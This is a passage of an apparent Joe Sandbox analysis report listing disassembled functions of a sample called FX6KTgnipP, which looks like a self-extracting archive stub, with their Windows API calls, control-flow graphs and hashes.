                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnvironmentVariable$H_prolog3_
                                                                                                                                                                            • String ID: sfxcmd$sfxpar
                                                                                                                                                                            • API String ID: 3605364767-3493335439
                                                                                                                                                                            • Opcode ID: d46371ad69b86ce66b1099da5832869a22793fea9994de22020bf569d86edc2c
                                                                                                                                                                            • Instruction ID: 91da52113a991ea0ebe2c052237323da62d35c2bb5acbe8489ecbacbace4e693
                                                                                                                                                                            • Opcode Fuzzy Hash: d46371ad69b86ce66b1099da5832869a22793fea9994de22020bf569d86edc2c
                                                                                                                                                                            • Instruction Fuzzy Hash: E7212670D20218DBCF14DFA8E9849EDB7B9EB09300F50442AF445A7640CB30AAA4CF64
                                                                                                                                                                            Function 0025F2CE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1320 25f2ce-25f2f7 GetClassNameW 1321 25f31f-25f321 1320->1321 1322 25f2f9-25f30e call 258da4 1320->1322 1324 25f323-25f325 1321->1324 1325 25f32c-25f338 call 265734 1321->1325 1329 25f310-25f31c FindWindowExW 1322->1329 1330 25f31e 1322->1330 1324->1325 1329->1330 1330->1321
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000050), ref: 0025F2EF
                                                                                                                                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 0025F326
                                                                                                                                                                              • Part of subcall function 00258DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00250E3F,?,?,?,00000046,00251ECE,00000046,?,exe,00000046), ref: 00258DBA
                                                                                                                                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0025F316
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                            • String ID: @Uxu$EDIT
                                                                                                                                                                            • API String ID: 4243998846-59804995
                                                                                                                                                                            • Opcode ID: 19e9ee90662cddf043f9dee98dd1c21e79027093126cdb2c4d4c87ac42ddf9bc
                                                                                                                                                                            • Instruction ID: 751c506268f3592b11d90a0a66a865ca3fab8587062e1c8fb865715f5b5d2eb2
                                                                                                                                                                            • Opcode Fuzzy Hash: 19e9ee90662cddf043f9dee98dd1c21e79027093126cdb2c4d4c87ac42ddf9bc
                                                                                                                                                                            • Instruction Fuzzy Hash: 11F0C831611219BBEB209F24AD09F9FB7BC9F45B01F040066BD01F7180D6B0A9598A69
                                                                                                                                                                            Function 0024E180 Relevance: 7.7, APIs: 5, Instructions: 183filetimeCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1331 24e180-24e1c9 1332 24e1d4 1331->1332 1333 24e1cb-24e1ce 1331->1333 1335 24e1d6-24e1e6 1332->1335 1333->1332 1334 24e1d0-24e1d2 1333->1334 1334->1335 1336 24e1ee-24e1f8 1335->1336 1337 24e1e8 1335->1337 1338 24e1fd-24e22a 1336->1338 1339 24e1fa 1336->1339 1337->1336 1340 24e232-24e238 1338->1340 1341 24e22c 1338->1341 1339->1338 1342 24e23c-24e254 CreateFileW 1340->1342 1343 24e23a 1340->1343 1341->1340 1344 24e316 1342->1344 1345 24e25a-24e28a GetLastError call 25169a 1342->1345 1343->1342 1347 24e319-24e31c 1344->1347 1351 24e28c-24e293 1345->1351 1352 24e2be 1345->1352 1349 24e31e-24e321 1347->1349 1350 24e32a-24e32e 1347->1350 1349->1350 1353 24e323 1349->1353 1354 24e330-24e333 1350->1354 1355 24e34f-24e360 1350->1355 1359 24e295 1351->1359 1360 24e298-24e2b8 CreateFileW GetLastError 1351->1360 1356 24e2c1-24e2cb 1352->1356 1353->1350 1354->1355 1361 24e335-24e34c SetFileTime 1354->1361 1357 24e374-24e39a call 241a66 call 265734 1355->1357 1358 24e362-24e370 call 2425c3 1355->1358 1362 24e300-24e314 1356->1362 1363 24e2cd-24e2e2 1356->1363 1358->1357 1359->1360 1360->1352 1366 24e2ba-24e2bc 1360->1366 1361->1355 1362->1347 1367 24e2e4-24e2f4 call 2419a9 1363->1367 1368 24e2f7-24e2ff call 265726 1363->1368 1366->1356 1367->1368 1368->1362
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,6294DA82,?,?,00000000,?,?,00000000,00279E6B,000000FF), ref: 0024E248
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00279E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0024E25A
                                                                                                                                                                            • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00279E6B,000000FF,?,00000011), ref: 0024E2A6
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00279E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0024E2AF
                                                                                                                                                                            • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00279E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 0024E346
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CreateErrorLast$Time
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1999340476-0
                                                                                                                                                                            • Opcode ID: 3e4bbfe2cd3ded5c206da9e66b1a677a92c6a4d3b2df9bb4148841cab0419ca2
                                                                                                                                                                            • Instruction ID: 6601fce1d1431c383c37651b4ed31895722f1623c4f36f3087ff95acbd2bed39
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e4bbfe2cd3ded5c206da9e66b1a677a92c6a4d3b2df9bb4148841cab0419ca2
                                                                                                                                                                            • Instruction Fuzzy Hash: 96618F7192424ADFEF28CF64D885BEE7BA4FF04314F204619F81997280D774A964CF94
                                                                                                                                                                            Function 002574EC Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1377 2574ec-257536 call 2577cf ReleaseSemaphore 1380 257556-25758a DeleteCriticalSection CloseHandle * 2 1377->1380 1381 257538 1377->1381 1382 25753b-257554 call 2575ed CloseHandle 1381->1382 1382->1380
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 002577CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,002473B8), ref: 002577E1
                                                                                                                                                                              • Part of subcall function 002577CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,002473B8), ref: 002577F5
                                                                                                                                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000,6294DA82,?,?,00000001,00000000,0027A603,000000FF,?,002590B9,?,?,00245630,?), ref: 0025752A
                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,?,002590B9,?,?,00245630,?,?,?,00000000,?,?,?,00000001,?), ref: 00257544
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,002590B9,?,?,00245630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 0025755D
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,002590B9,?,?,00245630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00257569
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,002590B9,?,?,00245630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00257575
                                                                                                                                                                              • Part of subcall function 002575ED: WaitForSingleObject.KERNEL32(?,000000FF,0025770A,?,?,0025777F,?,?,?,?,?,00257769), ref: 002575F3
                                                                                                                                                                              • Part of subcall function 002575ED: GetLastError.KERNEL32(?,?,0025777F,?,?,?,?,?,00257769), ref: 002575FF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1868215902-0
                                                                                                                                                                            • Opcode ID: 52a55060d2fe3968d51ac1190c2ecb59ba7f46cb960c4b80d8c1a5988be681dc
                                                                                                                                                                            • Instruction ID: 9e0c4fcf00010e8eeb1f89e36aa15927e3e78f00afaa9399df7a79d89873b870
                                                                                                                                                                            • Opcode Fuzzy Hash: 52a55060d2fe3968d51ac1190c2ecb59ba7f46cb960c4b80d8c1a5988be681dc
                                                                                                                                                                            • Instruction Fuzzy Hash: E411A172004704EFD7229F74EC88FCAFBA9FB08711F50492DF56A92260DB71A9948B94
                                                                                                                                                                            Function 00260678 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1385 260678-260691 PeekMessageW 1386 260693-2606a7 GetMessageW 1385->1386 1387 2606cc-2606ce 1385->1387 1388 2606b8-2606c6 TranslateMessage DispatchMessageW 1386->1388 1389 2606a9-2606b6 IsDialogMessageW 1386->1389 1388->1387 1389->1387 1389->1388
                                                                                                                                                                            APIs
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00260689
                                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0026069A
                                                                                                                                                                            • IsDialogMessageW.USER32(000103E6,?), ref: 002606AE
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 002606BC
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 002606C6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1266772231-0
                                                                                                                                                                            • Opcode ID: 1988ee07a4dccf442d72bfa619619627a33427c30e3eea0a15e203a99e065edc
                                                                                                                                                                            • Instruction ID: 01980ae7eb8ed89246f76a61b7ae85346c68365c2ff659aac733255d2cbfd2af
                                                                                                                                                                            • Opcode Fuzzy Hash: 1988ee07a4dccf442d72bfa619619627a33427c30e3eea0a15e203a99e065edc
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF0D0B192622AAB8B20AFE2FC4CDDB7FACEE452557004416F50AD2050E764D555CBB0
                                                                                                                                                                            Function 0025F4D4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00256C5E: __EH_prolog3_GS.LIBCMT ref: 00256C65
                                                                                                                                                                              • Part of subcall function 00256C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00256C9A
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0025F4ED
                                                                                                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0025F524
                                                                                                                                                                            • SHGetMalloc.SHELL32(0029532C), ref: 0025F52E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                                                                                                                                                            • String ID: riched20.dll
                                                                                                                                                                            • API String ID: 2446841611-3360196438
                                                                                                                                                                            • Opcode ID: 1e73802ccbf877735c7323ec7266357f331fa2013fc6da761aff9fd2da66912e
                                                                                                                                                                            • Instruction ID: 4b767052e4dc724114c4d91fec3b21d2c985c413c29d62c374ce0410052e7bc2
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e73802ccbf877735c7323ec7266357f331fa2013fc6da761aff9fd2da66912e
                                                                                                                                                                            • Instruction Fuzzy Hash: 78F044B1D10209ABCB10AFA9D84D9EEFBFCEF95301F00406AE805A2240DBB85605CFA0
                                                                                                                                                                            Function 0024E948 Relevance: 6.1, APIs: 4, Instructions: 117fileCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1394 24e948-24e961 call 2657d8 1397 24e963-24e965 1394->1397 1398 24e96a-24e974 1394->1398 1399 24eaa6-24eaab call 265787 1397->1399 1400 24e976-24e983 GetStdHandle 1398->1400 1401 24e988 1398->1401 1402 24ea6f-24ea72 1400->1402 1403 24e98b-24e998 1401->1403 1402->1403 1405 24e9df-24e9f4 WriteFile 1403->1405 1406 24e99a-24e99e 1403->1406 1408 24e9f7-24e9f9 1405->1408 1409 24e9a0-24e9ab 1406->1409 1410 24e9ff-24ea03 1406->1410 1408->1410 1411 24ea9f-24eaa2 1408->1411 1413 24e9ad 1409->1413 1414 24e9af-24e9ce WriteFile 1409->1414 1410->1411 1412 24ea09-24ea0d 1410->1412 1411->1399 1412->1411 1415 24ea13-24ea25 call 249230 1412->1415 1413->1414 1414->1408 1416 24e9d0-24e9db 1414->1416 1420 24ea77-24ea9a call 2414a7 call 249653 call 241a66 1415->1420 1421 24ea27-24ea30 1415->1421 1416->1409 1418 24e9dd 1416->1418 1418->1408 1420->1411 1421->1403 1423 24ea36-24ea3a 1421->1423 1423->1403 1425 24ea40-24ea6c 1423->1425 1425->1402
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024E94F
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,0000002C,00252D28,?,?,?,?,00000000,0025ABB6,?,?,?,?,?,0025A80E,?), ref: 0024E978
                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0024E9BE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileH_prolog3_HandleWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2898186245-0
                                                                                                                                                                            • Opcode ID: 31602be66d700b5805f4bc69af49481d2ef8fdc4f201b174c1195df6e46cc9a1
                                                                                                                                                                            • Instruction ID: 4c13abe9e0ac40a4ac73e34c23715636f46439b51cd5a777d31afe9ec64e03ad
                                                                                                                                                                            • Opcode Fuzzy Hash: 31602be66d700b5805f4bc69af49481d2ef8fdc4f201b174c1195df6e46cc9a1
                                                                                                                                                                            • Instruction Fuzzy Hash: 5841AD35A21215EFEF18DF64D884BADBB7ABF84700F154118F801AB281CB759DA4CBA1
                                                                                                                                                                            Function 0024EFEF Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0024EFF6
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,0024EBA7,?,00000001,00000000,?,?,00000024,0024A4DE,?,00000001,?,?), ref: 0024F01F
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,0024EBA7,?,00000001,00000000,?,?,00000024,0024A4DE,?), ref: 0024F075
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000024,0024EBA7,?,00000001,00000000,?,?,00000024,0024A4DE,?,00000001,?,?,00000000), ref: 0024F0E3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3709856315-0
                                                                                                                                                                            • Opcode ID: 8fcfbe49472acad9c4aca46c017a8715c476230bd09e0bd7892bd19f431659b6
                                                                                                                                                                            • Instruction ID: dd750d2be38a52f5a882523d8f4e952d5705e7b6a68cad2bcabdbb9042a54b0b
                                                                                                                                                                            • Opcode Fuzzy Hash: 8fcfbe49472acad9c4aca46c017a8715c476230bd09e0bd7892bd19f431659b6
                                                                                                                                                                            • Instruction Fuzzy Hash: EE31B271920219DBDF58DFE4DA88AEEBBB8AFC8300F14542AE401E3251D77489A5CB71
                                                                                                                                                                            Function 0024E019 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E029
                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,00000000,00100000,00000000,?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E041
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E073
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,0024E5D2,?,?,00000000,?,00000000), ref: 0024E092
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2244327787-0
                                                                                                                                                                            • Opcode ID: 7c68f57e3071a13fa63b5d9e27374294ee482580979659cd27cba68c11f7a4de
                                                                                                                                                                            • Instruction ID: 5142abce6b45b3a47d64e64a72b095bb61c21297e27f9c5e60b51327e966aef9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7c68f57e3071a13fa63b5d9e27374294ee482580979659cd27cba68c11f7a4de
                                                                                                                                                                            • Instruction Fuzzy Hash: B511C230520209EBFF385F60D808B6E37A9FB51320F225629E436A5190C7F1DEA49B61
                                                                                                                                                                            Function 0025FB4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0025FB52
                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?,00000000,0029535C), ref: 0025FC24
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileH_prolog3_Operation_wcslen
                                                                                                                                                                            • String ID: \S)
                                                                                                                                                                            • API String ID: 3104323202-1237555261
                                                                                                                                                                            • Opcode ID: f6e9a25c67c903014de217dab9b4cca38e0b262f9ebfe2ec437e4b21e2fc6870
                                                                                                                                                                            • Instruction ID: cf9c208b34542bccae348ca8d07d4c0e44b5d79044dc2e3a2a4c6e855b221c9d
                                                                                                                                                                            • Opcode Fuzzy Hash: f6e9a25c67c903014de217dab9b4cca38e0b262f9ebfe2ec437e4b21e2fc6870
                                                                                                                                                                            • Instruction Fuzzy Hash: 51314771D20358DADB15DFE8C986ADDBBB4BF08315F54012EE419A7292D7700AA9CF14
                                                                                                                                                                            Function 00257628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00010000,Function_00017760,?,00000000,?), ref: 0025764C
                                                                                                                                                                            • SetThreadPriority.KERNEL32(?,00000000,?,?,?,?,00000004,0024736D,00245AB0,?), ref: 00257693
                                                                                                                                                                              • Part of subcall function 002492EB: __EH_prolog3_GS.LIBCMT ref: 002492F2
                                                                                                                                                                              • Part of subcall function 00249500: __EH_prolog3_GS.LIBCMT ref: 00249507
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_Thread$CreatePriority
